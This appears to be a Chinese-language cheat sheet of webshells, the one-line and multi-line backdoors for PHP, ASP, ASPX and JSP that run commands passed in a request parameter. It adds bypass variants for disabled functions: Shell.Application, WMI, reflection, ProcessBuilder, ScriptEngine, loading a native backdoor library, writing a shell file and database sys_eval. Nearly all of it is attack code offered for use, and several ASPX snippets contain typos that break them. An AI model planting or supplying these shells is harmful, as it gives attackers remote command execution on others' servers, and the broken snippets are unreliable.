文章目录
- PHP
- ASP
- ASPX
-
- aspx一句话
- [System.Diagonstics.process() 被禁用](#System.Diagonstics.process() 被禁用)
- jsp
-
- jsp一句话
- [如果runtime被禁用 (**面试常问)**](#如果runtime被禁用 (面试常问))
PHP
php
<?php echo @eval($_REQUEST[888]); ?>
php
<?php @system($_GET[888]); ?> ASP
asp一句话
vbnet
<% @Language=VBScript %> <%-- 默认的省略 --%>
<% @Language=JScript %> <%-- 必须标注 --%>
typescript
<% eval request('cmd') %> //代码执行函数需要在前端传入 cmd=<% set ws=CreateObject(WScript.shell).exec('whoami'): Response.Write ws.StdOut.ReadAll() %>
<%execute request(777)%>
//该代码分为VBscript和JScript
typescript
<% set wx=CreateObject("WScript.shell").exec(request("cmd")):Response.Write wx.StdOut.ReadAll() %>比如
vbnet
<% @Language=JScript %> //定义js版本的asp一句话
<% var a = new ActiveXObject(WScript.shell).exec(request(999));Response.Write(a.StdOut.ReadAll();) %>CreateObject("WScript")被禁用
java
<%
On Error Resume Next
Set sa = CreateObject("Shell.Application")
sa.ShellExecute "cmd.exe", "/c " & Request("cmd") & " > c:\temp\result.txt", "", "open", 0
If Err.Number = 0 Then
Response.Write "Command executed via Shell.Application"
Else
Response.Write "Shell.Application failed: " & Err.Description
End If
%>
java
<%
On Error Resume Next
Set dotnet = CreateObject("System.Diagnostics.Process")
dotnet.StartInfo.FileName = "cmd.exe"
dotnet.StartInfo.Arguments = "/c " & Request("cmd")
dotnet.StartInfo.UseShellExecute = False
dotnet.StartInfo.RedirectStandardOutput = True
dotnet.Start()
Response.Write dotnet.StandardOutput.ReadToEnd()
If Err.Number <> 0 Then
Response.Write ".NET component failed"
End If
%>ASPX
aspx一句话
typescript
<%@ page Language="c#" %>
<% System.Diagnostics.Process.start("cmd.exe"+"/c "+Request['cmd']).StandardOutput.ReadToEnd(); %>
typescript
<%@ page Language="C#" %>
<script runat="server">
<%
void Page_Load(object sender, EventArgs e){
string cmd = Request["cmd"];
if (!string.IsNullOrEmpty(cmd)){
var proc = System.Diagnostics.process();
proc.StratInfo.FileName = "cmd.exe";
proc.StratInfo.Argument = "/c " + cmd;
proc.StratInfo.UseShellExecute = false; //是否使用windows的外壳来执行true的话无法重定向回显
proc.StratInfo.RedirectStandardOutput =true; //重定向输出到内存流 true的话就直接输出到控制台了
proc.StratInfo.RedirectStandardError = true; //重定向错误到内存流 报错也可以读取到
proc.Strat();
Response.Write(proc.StandardOutput.ReadToEnd());
}
}
%>
typescript
<%@ page Language="c#" %>
<%
var p = new System.Diagnostics.Process();
p.StratInfo.FileName = "cmd.exe";
p.StratInfo.Ageument = "/c "+ Request["cmd"];
p.StratInfo.UseShellExecute = fales;
p.StratInfo.RedirectStandardOutput = true;
p.start();
Response.Write(p.StandardOutput.ReadToEnd());
%>System.Diagonstics.process() 被禁用
java
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Management" %>
<%
try {
string cmd = Request["cmd"];
ManagementClass processClass = new ManagementClass("Win32_Process");
ManagementBaseObject inParams = processClass.GetMethodParameters("Create");
inParams["CommandLine"] = "cmd.exe /c " + cmd;
ManagementBaseObject result = processClass.InvokeMethod("Create", inParams, null);
Response.Write("Process started with ID: " + result["ProcessId"]);
} catch (Exception e) {
Response.Write("WMI Error: " + e.Message);
}
%>
java
<%@ Page Language="C#" %>
<%
try {
string cmd = Request["cmd"];
Type processType = Type.GetType("System.Diagnostics.Process");
System.Reflection.MethodInfo startMethod = processType.GetMethod("Start", new Type[] { typeof(string) });
object result = startMethod.Invoke(null, new object[] { cmd });
Response.Write("Reflection executed");
} catch (Exception e) {
Response.Write("Reflection Error: " + e.Message);
}
%>jsp
jsp一句话
java
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
java
<%@ page import="java.io.*" %><% Process proc= Runtime.getRuntime().exec(request.getparameter("cmd")); BufferedReader r = new BufferedReader(new InputStreamReader(proc.getInputStream())); String line; while((line = r.readLine()) !=null){out.println(line);} %>
java
<%@ page import="java.io.*"%>
<%
String [] cmd ={"/bin/sh","-c",request.getParameter("cmd")};
Process proc = Runtime.getRuntime().exec(cmd);
BufferedReader r = new BufferedReader(new InputStreamReader(proc.getInputStream()));
String line;
while ((line = r.readLine())!= null){
out.println(line);
}
%>
java
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String os = System.getProperty("os.name").toLowerCase();
Process proc;
if (os.contains("win")) {
// Windows系统
proc = Runtime.getRuntime().exec(new String[]{"cmd", "/c", cmd});
} else {
// Linux/Unix系统
proc = Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", cmd});
}
BufferedReader reader = new BufferedReader(new InputStreamReader(proc.getInputStream()));
String line;
while ((line = reader.readLine()) != null) {
out.println(line);
}
reader.close();
%>如果runtime被禁用 (面试常问)
java
<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
ProcessBuilder pb = new ProcessBuilder("/bin/sh", "-c", cmd);
pb.redirectErrorStream(true);
Process p = pb.start();
BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line;
while ((line = reader.readLine()) != null) {
out.println(line);
}
} catch (Exception e) {
out.println("ProcessBuilder Error: " + e.getMessage());
}
%>
java
<%@ page import="javax.script.*" %>
<%
try {
ScriptEngineManager manager = new ScriptEngineManager();
ScriptEngine engine = manager.getEngineByName("javascript");
String jsCode = "java.lang.Runtime.getRuntime().exec('" + request.getParameter("cmd") + "')";
engine.eval(jsCode);
out.println("JS executed");
} catch (Exception e) {
out.println("ScriptEngine Error: " + e.getMessage());
}
%>
java
<%@ page import="java.lang.reflect.*" %>
<%
try {
Class rt = Class.forName("java.lang.Runtime");
Method getRuntime = rt.getMethod("getRuntime");
Object runtime = getRuntime.invoke(null);
Method exec = rt.getMethod("exec", String.class);
Process p = (Process) exec.invoke(runtime, request.getParameter("cmd"));
BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line;
while ((line = reader.readLine()) != null) {
out.println(line);
}
} catch (Exception e) {
out.println("Reflection Error: " + e.getMessage());
}
%>
java
<%@ page import="java.nio.file.*" %>
<%
try {
// 通过JNI调用本地库(需要提前准备)
System.load("/tmp/backdoor.so");
out.println("JNI loaded");
} catch (Exception e) {
out.println("JNI Error: " + e.getMessage());
}
%>
java
<%@ page import="java.io.*" %>
<%
try {
String content = request.getParameter("file");
if (content != null) {
// 写入webshell文件
FileWriter fw = new FileWriter("/tmp/shell.jsp");
fw.write(content);
fw.close();
out.println("File written");
}
} catch (Exception e) {
out.println("File Error: " + e.getMessage());
}
%>
java
<%@ page import="java.sql.*" %>
<%
try {
Class.forName("com.mysql.jdbc.Driver");
Connection conn = DriverManager.getConnection("jdbc:mysql://localhost:3306/test", "root", "password");
Statement stmt = conn.createStatement();
// 通过数据库执行命令(如果支持)
ResultSet rs = stmt.executeQuery("SELECT sys_eval('" + request.getParameter("cmd") + "')");
if (rs.next()) {
out.println(rs.getString(1));
}
} catch (Exception e) {
out.println("DB Error: " + e.getMessage());
}
%>